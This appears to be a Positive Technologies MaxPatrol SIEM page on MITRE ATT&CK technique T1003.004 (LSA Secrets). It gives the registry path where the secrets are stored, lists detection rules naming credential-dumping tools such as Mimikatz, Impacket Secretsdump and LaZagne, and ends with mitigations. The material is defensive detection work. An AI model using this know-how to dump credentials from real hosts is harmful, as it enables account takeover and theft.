MaxPatrol SIEM

Detects cyberincidents that undermine cyber resilience of a company

T1003.004: LSA Secrets

Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts. LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets. LSA secrets can also be dumped from memory.

Reg can be used to extract from the Registry. Mimikatz can be used to extract secrets from memory.

Positive Technologies products that cover the technique

MaxPatrol SIEM knowledge base

mitre_attck_cred_access: PT-CR-566: LSA_SSP_Change: The values of the registry keys that contain paths of Security Support Provider (SSP) libraries are changed
hacking_tools: PT-CR-585: Impacket_Secretsdump: Use of Impacket Secretsdump is detected
hacking_tools: PT-CR-2118: adPEAS_Usage: The adPEAS script for domain reconnaissance was started
mitre_attck_cred_access: PT-CR-311: Remote_Password_Dump: Remote access to SAMR, WINREG, SVCCTL, and C:\Windows\system32 within 30 seconds of user authentication
hacking_tools: PT-CR-2237: Go_Secdump_Activity: The go-secdump utility was used, which is a tool built to remotely extract hashes from the registry hives without any remote agent and without touching disk
hacking_tools: PT-CR-758: Lazagne_Usage: Use of the LaZagne tool to dump credentials is detected
mitre_attck_cred_access: PT-CR-301: Credential_Dump_in_Local_Registry: Possible dumping of user credentials is detected

Detection

IDDS0024Data source and componentWindows Registry: Windows Registry Key AccessDescription

Monitor for the LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets being accessed

IDDS0017Data source and componentCommand: Command ExecutionDescription

Monitor executed commands and arguments that may access to a host may attempt to access Local Security Authority (LSA) secrets. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, which may require additional logging features to be configured in the operating system to collect necessary information for analysis.

Mitigation

IDM1027NamePassword PoliciesDescription

Ensure that local administrator accounts have complex, unique passwords across all systems on the network.

IDM1026NamePrivileged Account ManagementDescription

Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.

IDM1017NameUser TrainingDescription

Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.